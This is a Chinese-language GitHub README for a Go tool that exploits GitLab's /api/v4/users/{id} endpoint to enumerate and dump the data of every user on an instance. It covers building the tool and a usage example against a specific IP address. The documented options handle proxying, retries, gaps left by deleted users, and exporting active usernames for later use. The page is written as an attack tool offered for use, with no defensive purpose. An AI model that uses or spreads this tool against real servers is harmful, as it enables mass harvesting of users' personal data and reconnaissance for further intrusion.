Skip to content

Latest commit

 

History

History
69 lines (48 loc) · 2.37 KB

README.md

File metadata and controls

69 lines (48 loc) · 2.37 KB

GitLab用户枚举拖库工具

一、解决了什么问题

gitlab有一个用户名枚举的漏洞:

http://{host}/api/v4/users/{id}

这个工具就是用来将存在此种情况的gitlab的用户信息都拖下来。

亮点:

  1. 如果某个用户被删除了会返回404,导致和看起来没有用户了一样,如果只是简单粗暴地判断响应为404就退出很可能会因为id空洞导致漏掉用户,本工具对这种情况是做了兼容的
  2. 支持各种拖库、导出方式

二、下载安装

2.1 下载编译好的二进制文件

前往release页面根据自己的操作系统下载不同的二进制文件(暂未发布release版本)。

2.2 自己从源码编译

将项目克隆到本地:

git clone https://github.com/CC11001100/gitlab-api-user-enum-exploit.git

Linux:

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -o gitlab-api-user-enum-exploit main.go

Windows:

SET CGO_ENABLED=0
SET GOOS=windows
SET GOARCH=amd64
go build -o gitlab-api-user-enum-exploit.exe main.go

三、使用案例

拖所有用户的信息,后面的用户id1具体是几不重要,只要是个数字就可以:

gitlab-api-user-enum-exploit.exe run --api-url https://202.191.66.163/api/v4/users/1 --output-by-domain

四、使用文档

Usage:
-api-url 有用户泄露的API地址,比如 https://foo.com/api/v4/users/1
-site 所关联的网站,比如 https://foo.com
-from-file 从文件中批量运行,文件中每行是一个api url或者domain
-cut-off 指定当遇到几个连续的404才认为是脱完了,在实际脱裤的时候注意到会遇到过这种情况,比如id为10的用户返回404,但是id为11的用户就能正常返回信息,实际的用户数是好几十,如果只是简单粗暴地判断返回404就认为是拖完了,
那么就会在id为10的时候退出,后面的好几十个用户都没拖到,这是不能够容忍的,所以就引入了这个机制来兼容一下这种情况,只有当遇到连续n个404时才认为是拖完了,程序才会退出。
-proxy 请求时使用代理
-request-max-try-times 请求失败重试次数
-output-json-line-file 把拉取到的所有用户的信息保存到一个JsonLine文件
-output-username-file 把active状态的用户单独保存到一个文件中
-output-by-domain 根据域名自动生成文件名保存